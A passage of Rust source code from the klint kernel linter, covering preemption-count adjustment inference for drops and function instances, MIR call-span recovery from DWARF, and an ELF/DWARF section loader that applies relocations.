adj = new_adj;
}
return Ok(adj);
}
_ if let Some(boxed_ty) = ty.boxed_ty() => {
let adj = cx.drop_adjustment(typing_env.as_query_input(boxed_ty))?;
let drop_trait = cx.require_lang_item(LangItem::Drop, DUMMY_SP);
let drop_fn = cx.associated_item_def_ids(drop_trait)[0];
let box_free = ty::Instance::try_resolve(
cx.tcx,
typing_env,
drop_fn,
cx.mk_args(&[ty.into()]),
)
.unwrap()
.unwrap();
let box_free_adj = cx.instance_adjustment(typing_env.as_query_input(box_free))?;
let Some(adj) = adj.checked_add(box_free_adj) else {
cx.drop_adjustment_overflow(poly_ty)?
};
return Ok(adj);
}
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_adjustment(poly_poly_ty) {
Err(Error::TooGeneric) => (),
adjustment => return adjustment,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
if let Some(adj) = cx.drop_preemption_count_annotation(def.did()).adjustment {
info!("adjustment {} from annotation", adj);
return Ok(adj);
}
}
ty::Dynamic(pred, _) => {
if let Some(principal_trait) = pred.principal_def_id() {
if let Some(adj) = cx
.drop_preemption_count_annotation(principal_trait)
.adjustment
{
return Ok(adj);
}
}
return Ok(crate::atomic_context::VDROP_DEFAULT.0);
}
ty::Array(elem_ty, size) => {
let infcx = cx.tcx.infer_ctxt().build(TypingMode::PostAnalysis);
let size = rustc_trait_selection::traits::evaluate_const(
&infcx,
*size,
typing_env.param_env,
)
.try_to_target_usize(cx.tcx)
.ok_or(Error::TooGeneric);
if size == Ok(0) {
return Ok(0);
}
let elem_adj = cx.drop_adjustment(typing_env.as_query_input(*elem_ty))?;
if elem_adj == 0 {
return Ok(0);
}
let Ok(size) = i32::try_from(size?) else {
cx.drop_adjustment_overflow(poly_ty)?
};
let Some(adj) = size.checked_mul(elem_adj) else {
cx.drop_adjustment_overflow(poly_ty)?
};
return Ok(adj);
}
ty::Slice(elem_ty) => {
let elem_adj = cx.drop_adjustment(typing_env.as_query_input(*elem_ty))?;
if elem_adj != 0 {
let mut diag = cx.dcx().struct_err(
"dropping element of slice causes non-zero preemption count adjustment",
);
diag.note(format!(
"adjustment for dropping `{}` is {}",
elem_ty, elem_adj
));
diag.note(
"because slice can contain variable number of elements, adjustment \
for dropping the slice cannot be computed statically",
);
return Err(Error::Error(cx.emit_with_use_site_info(diag)));
}
return Ok(0);
}
_ => return Err(Error::TooGeneric),
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
let poly_instance = typing_env.as_query_input(instance);
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
if typing_env.param_env.caller_bounds().is_empty() {
return Ok(0);
} else {
// If we are handling generic functions, then defer decision to monomorphization time.
return Err(Error::TooGeneric);
}
}
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
let result = cx.infer_adjustment(typing_env, instance, &mir);
// Recursion encountered.
if let Some(&recur) = cx.query_cache::<drop_adjustment>().borrow().get(&poly_ty) {
match (result, recur) {
(_, Err(Error::Error(_))) => bug!("recursive callee errors"),
// Error already reported.
(Err(Error::Error(_)), _) => (),
(Err(_), Err(_)) => (),
(Ok(a), Ok(b)) if a == b => (),
(Ok(_), Err(_)) => bug!("recursive callee too generic but caller is not"),
(Err(_), Ok(_)) => bug!("monormorphic caller too generic"),
(Ok(adj), Ok(_)) => {
let mut diag = cx.dcx().struct_span_err(
ty.ty_adt_def()
.map(|x| cx.def_span(x.did()))
.unwrap_or_else(|| cx.def_span(instance.def_id())),
"dropping this type causes recursion but preemption count adjustment is not 0",
);
diag.note(format!("adjustment is inferred to be {}", adj));
diag.note(format!("type being dropped is `{}`", ty));
diag.emit();
}
}
}
result
}
);
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
pub fn drop_adjustment_check<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<(), Error> {
let adjustment = cx.drop_adjustment(poly_ty)?;
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then there is trivially no adjustment.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(());
}
let annotation;
match ty.kind() {
ty::Closure(..)
| ty::Coroutine(..)
| ty::Tuple(..)
| ty::Dynamic(..)
| ty::Array(..)
| ty::Slice(..) => return Ok(()),
// Box is always inferred
ty::Adt(def, _) if def.is_box() => return Ok(()),
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_adjustment_check(poly_poly_ty) {
Err(Error::TooGeneric) => (),
result => return result,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
annotation = cx.drop_preemption_count_annotation(def.did());
if let Some(adj) = annotation.adjustment {
assert!(adj == adjustment);
}
}
_ => return Err(Error::TooGeneric),
}
// If adjustment is inferred or the type is annotated as unchecked,
// then we don't need to do any further checks.
if annotation.adjustment.is_none() || annotation.unchecked {
return Ok(());
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
let adjustment_infer = cx.infer_adjustment(typing_env, instance, &mir)?;
// Check if the inferred adjustment matches the annotation.
if let Some(adjustment) = annotation.adjustment {
if adjustment != adjustment_infer {
let mut diag = cx.dcx().struct_span_err(
cx.def_span(instance.def_id()),
format!(
"type annotated to have drop preemption count adjustment of {adjustment}"
),
);
diag.note(format!("but the adjustment inferred is {adjustment_infer}"));
cx.emit_with_use_site_info(diag);
}
}
Ok(())
}
);
memoize!(
#[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
pub fn instance_adjustment<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
) -> Result<i32, Error> {
let PseudoCanonicalInput {
typing_env,
value: instance,
} = poly_instance;
match instance.def {
// No Rust built-in intrinsics will mess with preemption count.
ty::InstanceKind::Intrinsic(_) => return Ok(0),
// Empty drop glue, then it definitely won't mess with preemption count.
ty::InstanceKind::DropGlue(_, None) => return Ok(0),
ty::InstanceKind::DropGlue(_, Some(ty)) => {
return cx.drop_adjustment(typing_env.as_query_input(ty));
}
ty::InstanceKind::Virtual(def_id, _) => {
if let Some(adj) = cx.preemption_count_annotation(def_id).adjustment {
return Ok(adj);
}
return Ok(crate::atomic_context::VCALL_DEFAULT.0);
}
_ => (),
}
let mut generic = false;
if matches!(instance.def, ty::InstanceKind::Item(_)) {
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, instance.def_id());
let poly_args = cx.erase_and_anonymize_regions(GenericArgs::identity_for_item(
cx.tcx,
instance.def_id(),
));
let poly_poly_instance =
poly_typing_env.as_query_input(Instance::new_raw(instance.def_id(), poly_args));
generic = poly_poly_instance == poly_instance;
if !generic {
match cx.instance_adjustment(poly_poly_instance) {
Err(Error::TooGeneric) => (),
adjustment => return adjustment,
}
}
}
if cx.is_foreign_item(instance.def_id()) {
return Ok(cx
.ffi_property(instance)
.unwrap_or(crate::atomic_context::FFI_USE_DEFAULT)
.0);
}
if !cx.tcx.should_codegen_locally(instance) {
if let Some(p) = cx.sql_load::<instance_adjustment>(poly_instance) {
return p;
}
// If we cannot load it, use annotation (e.g. libcore).
return Ok(cx
.preemption_count_annotation(instance.def_id())
.adjustment
.unwrap_or(0));
}
// Use annotation if available.
if let Some(adj) = cx.preemption_count_annotation(instance.def_id()).adjustment {
info!("adjustment {} from annotation", adj);
return Ok(adj);
}
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
if typing_env.param_env.caller_bounds().is_empty() {
return Ok(0);
} else {
// If we are handling generic functions, then defer decision to monomorphization time.
return Err(Error::TooGeneric);
}
}
let mir = cx.analysis_instance_mir(instance.def);
let mut result = cx.infer_adjustment(typing_env, instance, mir);
// Recursion encountered.
if let Some(&recur) = cx
.query_cache::<instance_adjustment>()
.borrow()
.get(&poly_instance)
{
match (result, recur) {
(_, Err(Error::Error(_))) => {
// This should not happen because the recursive callee should either return 0
// or TooGeneric (see above).
bug!("recursive callee errors");
}
// Error already reported.
(Err(Error::Error(_)), _) => (),
(Err(Error::TooGeneric), Err(Error::TooGeneric)) => (),
(Ok(a), Ok(b)) if a == b => (),
(Ok(_), Err(Error::TooGeneric)) => {
// This can happen when the recursive call only occurs in a false, unwinding, or diverging path.
// (e.g. perform a recursive call, then diverge).
// In this case we still get the correct inferred value, *but* just using it
// will cause discrepancy with the non-TooGeneric case. So we instead just
// going to return `TooGeneric` so that it's tried later.
result = Err(Error::TooGeneric);
}
(Err(_), Ok(_)) => bug!("monormorphic caller too generic"),
(Ok(adj), Ok(_)) => {
let mut diag = cx.dcx().struct_span_err(
cx.def_span(instance.def_id()),
"this function is recursive but preemption count adjustment is not 0",
);
diag.note(format!("adjustment is inferred to be {}", adj));
if !generic {
diag.note(format!(
"instance being checked is `{}`",
PolyDisplay(&poly_instance)
));
}
diag.help(format!(
"try annotate the function with `#[klint::preempt_count(adjust = {adj})]`"
));
diag.emit();
}
}
}
if instance.def_id().is_local()
&& (generic || typing_env.param_env.caller_bounds().is_empty())
{
cx.sql_store::<instance_adjustment>(poly_instance, result);
}
if cx.should_report_preempt_count(instance.def_id()) {
let mut diag = cx.sess.dcx().struct_note(format!(
"reporting preemption count for instance `{}`",
PolyDisplay(&poly_instance)
));
diag.span(cx.def_span(instance.def_id()));
if let Ok(property) = result {
diag.note(format!("adjustment is inferred to be {}", property));
} else {
diag.note("adjustment inference failed because this function is too generic");
}
diag.emit();
}
result
}
);
memoize!(
#[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
pub fn instance_adjustment_check<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
) -> Result<(), Error> {
let adjustment = cx.instance_adjustment(poly_instance)?;
let PseudoCanonicalInput {
typing_env,
value: instance,
} = poly_instance;
// Only check locally codegenned instances.
if !cx.tcx.should_codegen_locally(instance) {
return Ok(());
}
match instance.def {
// No Rust built-in intrinsics will mess with preemption count.
ty::InstanceKind::Intrinsic(_) => return Ok(()),
// Empty drop glue, then it definitely won't mess with preemption count.
ty::InstanceKind::DropGlue(_, None) => return Ok(()),
ty::InstanceKind::DropGlue(_, Some(ty)) => {
return cx.drop_adjustment_check(typing_env.as_query_input(ty));
}
// Checked by indirect checks
ty::InstanceKind::Virtual(_, _) => return Ok(()),
_ => (),
}
// Prefer to do polymorphic check if possible.
if matches!(instance.def, ty::InstanceKind::Item(_)) {
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, instance.def_id());
let poly_args = cx.erase_and_anonymize_regions(GenericArgs::identity_for_item(
cx.tcx,
instance.def_id(),
));
let poly_poly_instance =
poly_typing_env.as_query_input(Instance::new_raw(instance.def_id(), poly_args));
let generic = poly_poly_instance == poly_instance;
if !generic {
match cx.instance_adjustment_check(poly_poly_instance) {
Err(Error::TooGeneric) => (),
result => return result,
}
}
}
// We need to perform the following checks:
// * If there is an annotation, then `instance_adjustment` will just use that annotation.
// We need to make sure that the annotation is correct.
// * If trait impl method has annotation, then we need to check that whatever we infer/annotate from
// `instance_adjustment` matches that one.
// * If the method is callable from FFI, then we also need to check it matches our FFI adjustment.
let annotation = cx.preemption_count_annotation(instance.def_id());
if let Some(adj) = annotation.adjustment {
assert!(adj == adjustment);
}
if annotation.adjustment.is_some() && !annotation.unchecked {
let mir = cx.analysis_instance_mir(instance.def);
let adjustment_infer = cx.infer_adjustment(typing_env, instance, mir)?;
// Check if the inferred adjustment matches the annotation.
if adjustment != adjustment_infer {
let mut diag = cx.dcx().struct_span_err(
cx.def_span(instance.def_id()),
format!(
"function annotated to have preemption count adjustment of {adjustment}"
),
);
diag.note(format!("but the adjustment inferred is {adjustment_infer}"));
cx.emit_with_use_site_info(diag);
}
}
// Addition check for trait impl methods.
if matches!(instance.def, ty::InstanceKind::Item(_))
&& let Some(impl_) = cx.impl_of_assoc(instance.def_id())
&& let Some(trait_) = cx.impl_opt_trait_id(impl_)
{
let trait_def = cx.trait_def(trait_);
let trait_item = cx
.associated_items(impl_)
.in_definition_order()
.find(|x| x.def_id == instance.def_id())
.unwrap()
.trait_item_def_id()
.unwrap();
for ancestor in trait_def.ancestors(cx.tcx, impl_).unwrap() {
let Some(ancestor_item) = ancestor.item(cx.tcx, trait_item) else {
continue;
};
if let Some(ancestor_adj) = cx
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/reconstruct.rs | src/binary_analysis/reconstruct.rs | use std::sync::Arc;
use rustc_data_structures::fx::FxHashMap;
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::{Instance, TyCtxt};
use rustc_middle::{mir, ty};
use rustc_span::{BytePos, DUMMY_SP, FileName, RemapPathScopeComponents, Span};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::use_stack::UseSiteKind;
memoize!(
fn mono_items<'tcx>(cx: &AnalysisCtxt<'tcx>) -> Arc<Vec<MonoItem<'tcx>>> {
let mono_items = crate::monomorphize_collector::collect_crate_mono_items(
cx.tcx,
crate::monomorphize_collector::MonoItemCollectionStrategy::Lazy,
)
.0;
mono_items.into()
}
);
memoize!(
fn symbol_name_map<'tcx>(cx: &AnalysisCtxt<'tcx>) -> Arc<FxHashMap<&'tcx str, MonoItem<'tcx>>> {
let map = cx.mono_items();
Arc::new(
map.iter()
.map(|&item| (item.symbol_name(cx.tcx).name, item))
.collect(),
)
}
);
impl<'tcx> AnalysisCtxt<'tcx> {
pub fn symbol_name_to_mono(&self, name: &str) -> Option<MonoItem<'tcx>> {
self.symbol_name_map().get(name).copied()
}
}
pub fn recover_span_from_line_no<'tcx>(
tcx: TyCtxt<'tcx>,
location: &super::dwarf::Location,
) -> Option<Span> {
// Find the file in session's source map.
let source_map = tcx.sess.source_map();
let mut found_file = None;
for file in source_map.files().iter() {
if let FileName::Real(real) = &file.name {
if real.path(RemapPathScopeComponents::DEBUGINFO) == location.file {
found_file = Some(file.clone());
}
}
}
let Some(found_file) = found_file else {
return None;
};
let range = found_file.line_bounds((location.line as usize).saturating_sub(1));
Some(Span::with_root_ctxt(
BytePos(range.start.0 + location.column.saturating_sub(1) as u32),
// We only have a single column info. A good approximation is to extend to end of line (which is typically the case for function calls).
BytePos(range.end.0 - 1),
))
}
// Compare a recovered span from a compiler-produced span, and determine if they're likely the same source.
pub fn recover_span<'tcx>(recover_span: Span, span: Span) -> bool {
// Recovered span is produced through debug info. This will undergo the debuginfo collapse process.
// Before comparing, undergo the same process for `span`.
let collapsed = rustc_span::hygiene::walk_chain_collapsed(span, DUMMY_SP);
let range = collapsed.lo()..collapsed.hi();
range.contains(&recover_span.lo())
}
pub fn recover_fn_call_span<'tcx>(
tcx: TyCtxt<'tcx>,
caller: Instance<'tcx>,
callee: &str,
location: Option<&super::dwarf::Location>,
) -> Option<(Instance<'tcx>, UseSiteKind)> {
let mir = tcx.instance_mir(caller.def);
let mut callee_instance = None;
let mut sites = Vec::new();
for block in mir.basic_blocks.iter() {
let terminator = block.terminator();
// Skip over inlined body. We'll check them from scopes directly.
if mir.source_scopes[terminator.source_info.scope]
.inlined
.is_some()
{
continue;
}
match terminator.kind {
mir::TerminatorKind::Call { ref func, .. }
| mir::TerminatorKind::TailCall { ref func, .. } => {
let callee_ty = func.ty(mir, tcx);
let callee_ty = caller.instantiate_mir_and_normalize_erasing_regions(
tcx,
ty::TypingEnv::fully_monomorphized(),
ty::EarlyBinder::bind(callee_ty),
);
let ty::FnDef(def_id, args) = *callee_ty.kind() else {
continue;
};
let instance = ty::Instance::expect_resolve(
tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
terminator.source_info.span,
);
if tcx.symbol_name(instance).name != callee {
continue;
}
callee_instance = Some(instance);
sites.push(UseSiteKind::Call(terminator.source_info.span));
}
mir::TerminatorKind::Drop { ref place, .. } => {
let ty = place.ty(mir, tcx).ty;
let ty = caller.instantiate_mir_and_normalize_erasing_regions(
tcx,
ty::TypingEnv::fully_monomorphized(),
ty::EarlyBinder::bind(ty),
);
let instance = Instance::resolve_drop_in_place(tcx, ty);
if tcx.symbol_name(instance).name != callee {
continue;
}
callee_instance = Some(instance);
sites.push(UseSiteKind::Drop {
drop_span: terminator.source_info.span,
place_span: mir.local_decls[place.local].source_info.span,
});
}
_ => continue,
};
}
// In addition to direct function calls, we should also inspect inlined functions.
for scope in mir.source_scopes.iter() {
if scope.inlined_parent_scope.is_none()
&& let Some((instance, span)) = scope.inlined
{
if tcx.symbol_name(instance).name != callee {
continue;
}
callee_instance = Some(instance);
sites.push(UseSiteKind::Call(span));
}
}
let Some(callee_instance) = callee_instance else {
tracing::error!("{} does not contain call to {}", caller, callee);
return None;
};
// If there's only a single span, then it has to be the correct span.
if sites.len() == 1 {
return Some((callee_instance, sites.pop().unwrap()));
}
// Otherwise, we need to use the DWARF location information to find the best related span.
let Some(loc) = &location else {
tracing::warn!(
"no way to distinguish {}'s use of {}",
caller,
callee_instance
);
return Some((callee_instance, sites.pop().unwrap()));
};
let Some(recovered_span) = recover_span_from_line_no(tcx, loc) else {
tracing::warn!(
"no way to distinguish {}'s use of {}",
caller,
callee_instance
);
return Some((callee_instance, sites.pop().unwrap()));
};
// Now we have a recovered span. Use this span to match spans that we have.
for site in sites {
if recover_span(recovered_span, site.span()) {
return Some((callee_instance, site));
}
}
// No perfect match, just use the recovered span that we have.
Some((callee_instance, UseSiteKind::Call(recovered_span)))
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/dwarf.rs | src/binary_analysis/dwarf.rs | use std::num::NonZero;
use std::ops::Range;
use std::path::PathBuf;
use std::sync::Arc;
use std::{borrow::Cow, collections::BTreeMap};
use gimli::{
AttributeValue, DebuggingInformationEntry, Dwarf, EndianSlice, LineProgramHeader, LineRow, Unit,
};
use object::Object;
use object::{
Endian, File, ObjectSection, ObjectSymbol, RelocationKind, RelocationTarget, Section,
SectionIndex, elf::SHF_ALLOC,
};
use thiserror::Error;
#[derive(Debug, Error)]
pub enum Error {
#[error("{0}")]
Object(#[from] object::Error),
#[error("{0}")]
Gimli(gimli::Error),
#[error("unexpected ELF information: {0}")]
UnexpectedElf(&'static str),
#[error("unexpected DWARF information: {0}")]
UnexpectedDwarf(&'static str),
#[error("{0}")]
Other(&'static str),
}
impl From<gimli::Error> for Error {
fn from(value: gimli::Error) -> Self {
Self::Gimli(value)
}
}
// Section address encoder and decoder.
//
// `gimli` library does not natively handle relocations; this is fine for binaries, but for relocatable
// object files, sections begin with address 0 and you cannot tell apart different sections by looking at address.
//
// To solve this, we lay all sections flat in memory (with some gaps between in cases there are pointers going beyond section boundaries).
// We can then use these offsets to provide revese lookup to determine the symbolic addresses.
struct SectionLayout {
forward_map: Vec<(u64, u64)>,
reverse_map: BTreeMap<u64, usize>,
}
impl SectionLayout {
const SECTION_GAP: u64 = 65536;
fn for_object<'data>(object: &File<'data>) -> Result<Self, Error> {
fn section_alloc(section: &Section<'_, '_>) -> bool {
match section.flags() {
object::SectionFlags::None => false,
object::SectionFlags::Elf { sh_flags } => sh_flags & SHF_ALLOC as u64 != 0,
_ => bug!(),
}
}
let section_count = object
.sections()
.map(|x| x.index().0)
.max()
.unwrap_or_default()
+ 1;
// All non-allocate sections go to address 0, where we pre-allocate based on the maximum size.
let unalloc_sections_max = object
.sections()
.filter(section_alloc)
.map(|x| x.size())
.max()
.unwrap_or(0);
let overflow_err =
|| Error::UnexpectedElf("cannot lay all sections in 64-bit address space");
let mut allocated = unalloc_sections_max
.checked_add(Self::SECTION_GAP)
.ok_or_else(overflow_err)?;
let mut forward_map = vec![(0, 0); section_count];
let mut reverse_map = BTreeMap::new();
for section in object.sections() {
let index = section.index();
if !section_alloc(§ion) {
forward_map[index.0] = (0, section.size());
continue;
}
let address = allocated
.checked_next_multiple_of(section.align())
.ok_or_else(overflow_err)?;
forward_map[index.0] = (address, section.size());
reverse_map.insert(address, index.0);
allocated = address
.checked_add(section.size())
.ok_or_else(overflow_err)?
.checked_add(Self::SECTION_GAP)
.ok_or_else(overflow_err)?;
}
if allocated
.checked_add(Self::SECTION_GAP)
.ok_or_else(overflow_err)?
> i64::MAX as u64
{
Err(overflow_err())?;
}
Ok(SectionLayout {
forward_map,
reverse_map,
})
}
fn encode(&self, section: SectionIndex, offset: i64) -> Result<u64, Error> {
let (address, size) = self.forward_map[section.0];
if offset < -(Self::SECTION_GAP as i64 / 2)
|| offset > (size + Self::SECTION_GAP / 2) as i64
{
Err(Error::UnexpectedElf("symbol offset too big"))?
}
Ok(address.wrapping_add(offset as _))
}
fn decode(&self, address: u64) -> Result<(SectionIndex, i64), Error> {
let address_plus_gap = address
.checked_add(Self::SECTION_GAP / 2)
.ok_or(Error::UnexpectedElf("unexpected symbol offset"))?;
let Some((§ion_start, &index)) = self.reverse_map.range(..address_plus_gap).next_back()
else {
Err(Error::UnexpectedElf(
"address from unallocated section cannot be decoded",
))?
};
let offset = (address as i64).wrapping_sub(section_start as _);
assert_eq!(self.encode(SectionIndex(index), offset).unwrap(), address);
Ok((SectionIndex(index), offset))
}
}
fn load_section<'file, 'data>(
object: &'file File<'data>,
layout: &SectionLayout,
name: &str,
) -> Result<Cow<'data, [u8]>, Error> {
let Some(section) = object.section_by_name(name) else {
return Ok(Cow::Borrowed(&[]));
};
let mut data = section.uncompressed_data()?;
for (offset, reloc) in section.relocations() {
let data_mut = data.to_mut();
let (symbol_section_index, symbol_offset) = match reloc.target() {
RelocationTarget::Symbol(symbol) => {
let symbol = object
.symbol_by_index(symbol)
.map_err(|_| Error::UnexpectedElf("symbol not found"))?;
let Some(section_index) = symbol.section().index() else {
Err(Error::UnexpectedElf(
"symbol is not associated with a section",
))?
};
(section_index, symbol.address())
}
RelocationTarget::Section(section_index) => (section_index, 0),
RelocationTarget::Absolute | _ => Err(Error::UnexpectedElf(
"absolute relocation target found in DWARF section",
))?,
};
let symbol_section = object
.section_by_index(symbol_section_index)
.map_err(|_| Error::UnexpectedElf("section not found"))?;
if symbol_section.address() != 0 {
Err(Error::UnexpectedElf(
"section address is non-zero in a relocatable file",
))?
}
let address = layout.encode(symbol_section_index, symbol_offset as _)?;
let value = match reloc.kind() {
RelocationKind::Absolute => reloc.addend().wrapping_add(address as _),
RelocationKind::Relative => {
let ptr = layout.encode(section.index(), offset as _)?;
reloc
.addend()
.wrapping_add(address as _)
.wrapping_sub(ptr as _)
}
_ => Err(Error::UnexpectedElf("unknown relocation kind found"))?,
};
match reloc.size() {
32 => {
let addend = if reloc.has_implicit_addend() {
i32::from_le_bytes(data_mut[offset as usize..][..4].try_into().unwrap())
} else {
0
};
let value: i32 = value
.wrapping_add(addend as i64)
.try_into()
.map_err(|_| Error::UnexpectedElf("relocation truncated to fit"))?;
data_mut[offset as usize..][..4].copy_from_slice(&value.to_le_bytes());
}
64 => {
let addend = if reloc.has_implicit_addend() {
i64::from_le_bytes(data_mut[offset as usize..][..8].try_into().unwrap())
} else {
0
};
let value = value.wrapping_add(addend as i64);
data_mut[offset as usize..][..8].copy_from_slice(&value.to_le_bytes());
}
_ => Err(Error::UnexpectedElf("unknown relocation size"))?,
}
}
Ok(data)
}
type ReaderTy<'a> = EndianSlice<'a, gimli::LittleEndian>;
pub struct DwarfLoader<'file, 'data> {
section_layout: SectionLayout,
// This is actually `Dwarf<ReaderTy<'dwarf_sections>`.
dwarf: Dwarf<ReaderTy<'file>>,
#[allow(unused)]
dwarf_sections: Arc<gimli::DwarfSections<Cow<'data, [u8]>>>,
#[allow(unused)]
eh_frame_section: Cow<'data, [u8]>,
}
#[derive(Clone, Debug)]
pub struct Location {
pub file: PathBuf,
pub line: u64,
pub column: u64,
}
#[derive(Debug)]
pub struct Call {
pub caller: String,
pub callee: String,
pub location: Option<Location>,
}
impl<'file, 'data> DwarfLoader<'file, 'data> {
pub fn new(object: &'file File<'data>) -> Result<Self, Error> {
if !object.endianness().is_little_endian() {
Err(Error::UnexpectedElf(
"only little endian object files are supported",
))?
}
let section_layout = SectionLayout::for_object(object)?;
let dwarf_sections = Arc::new(gimli::DwarfSections::load(|id| {
load_section(object, §ion_layout, id.name())
})?);
// Also load `.eh_frame` which may be present in place of `.debug_frame`.
let eh_frame_section = load_section(object, §ion_layout, ".eh_frame")?;
let dwarf =
dwarf_sections.borrow(|section| gimli::EndianSlice::new(section, gimli::LittleEndian));
// SAFETY: erase lifetime. This is fine as `dwarf` will be dropped before `dwarf_sections`.
let dwarf_transmute =
unsafe { std::mem::transmute::<Dwarf<ReaderTy<'_>>, Dwarf<ReaderTy<'_>>>(dwarf) };
Ok(Self {
section_layout,
dwarf: dwarf_transmute,
dwarf_sections,
eh_frame_section,
})
}
// This returns the correct lifetime instead of the hacked one.
fn dwarf(&self) -> &Dwarf<ReaderTy<'_>> {
&self.dwarf
}
/// Obtain the linkage name of a subprogram or inlined subroutine.
fn linkage_name(
&self,
unit: &Unit<ReaderTy<'_>>,
die: &DebuggingInformationEntry<'_, '_, ReaderTy<'_>>,
) -> Result<String, Error> {
let mut attrs = die.attrs();
let mut name = None;
let mut deleg = None;
while let Some(attr) = attrs.next()? {
match attr.name() {
gimli::DW_AT_linkage_name => {
return Ok(self
.dwarf()
.attr_string(unit, attr.value())?
.to_string()?
.to_owned());
}
gimli::DW_AT_name => {
name = Some(
self.dwarf()
.attr_string(unit, attr.value())?
.to_string()?
.to_owned(),
);
}
gimli::DW_AT_abstract_origin | gimli::DW_AT_specification => {
// Delegation
deleg = Some(attr.value());
}
_ => (),
}
}
if let Some(name) = name {
return Ok(name);
}
let Some(refer) = deleg else {
Err(Error::UnexpectedDwarf(
"Cannot find name for DW_TAG_subprogram",
))?
};
match refer {
AttributeValue::UnitRef(offset) => {
let mut entries = unit.entries_at_offset(offset)?;
entries
.next_entry()?
.ok_or(Error::UnexpectedDwarf("Referenced entry not found"))?;
let next_die = entries.current().unwrap();
self.linkage_name(unit, next_die)
}
_ => Err(Error::UnexpectedDwarf("Unsupported reference type"))?,
}
}
/// Obtain PC ranges related to a DIE.
fn ranges(
&self,
unit: &Unit<ReaderTy<'_>>,
die: &DebuggingInformationEntry<'_, '_, ReaderTy<'_>>,
) -> Result<(SectionIndex, Vec<Range<i64>>), Error> {
let mut ranges = Vec::new();
let mut attrs = die.attrs();
while let Some(attr) = attrs.next()? {
match attr.name() {
gimli::DW_AT_low_pc => {
let Some(low_pc) = self.dwarf().attr_address(unit, attr.value())? else {
Err(Error::UnexpectedDwarf("DW_AT_low_pc is not an address"))?
};
let Some(high_pc) = die.attr_value(gimli::DW_AT_high_pc)? else {
Err(Error::UnexpectedDwarf(
"DW_AT_high_pc not found at DW_TAG_inlined_subroutine",
))?
};
let Some(high_pc) = high_pc.udata_value() else {
Err(Error::UnexpectedDwarf("DW_AT_high_pc is not udata"))?
};
ranges.push((low_pc, high_pc));
}
// This is handled by DW_AT_low_pc.
gimli::DW_AT_high_pc => (),
gimli::DW_AT_ranges => {
let offset = match attr.value() {
AttributeValue::DebugRngListsIndex(offset) => {
self.dwarf().ranges_offset(unit, offset)?
}
AttributeValue::RangeListsRef(offset) => {
self.dwarf().ranges_offset_from_raw(unit, offset)
}
_ => Err(Error::UnexpectedDwarf(
"DW_AT_ranges is not rnglist reference",
))?,
};
let mut range = self.dwarf().ranges(unit, offset)?;
while let Some(range) = range.next()? {
ranges.push((range.begin, range.end.wrapping_sub(range.begin)));
}
}
_ => (),
}
}
if ranges.is_empty() {
return Ok((SectionIndex(0), Vec::new()));
}
let encoded_section = self.section_layout.decode(ranges[0].0)?.0;
let ranges = ranges
.into_iter()
.map(|(begin, len)| {
let (sec, begin) = self.section_layout.decode(begin)?;
if sec != encoded_section {
return Err(Error::UnexpectedDwarf(
"Single DIE covers multiple sections",
));
}
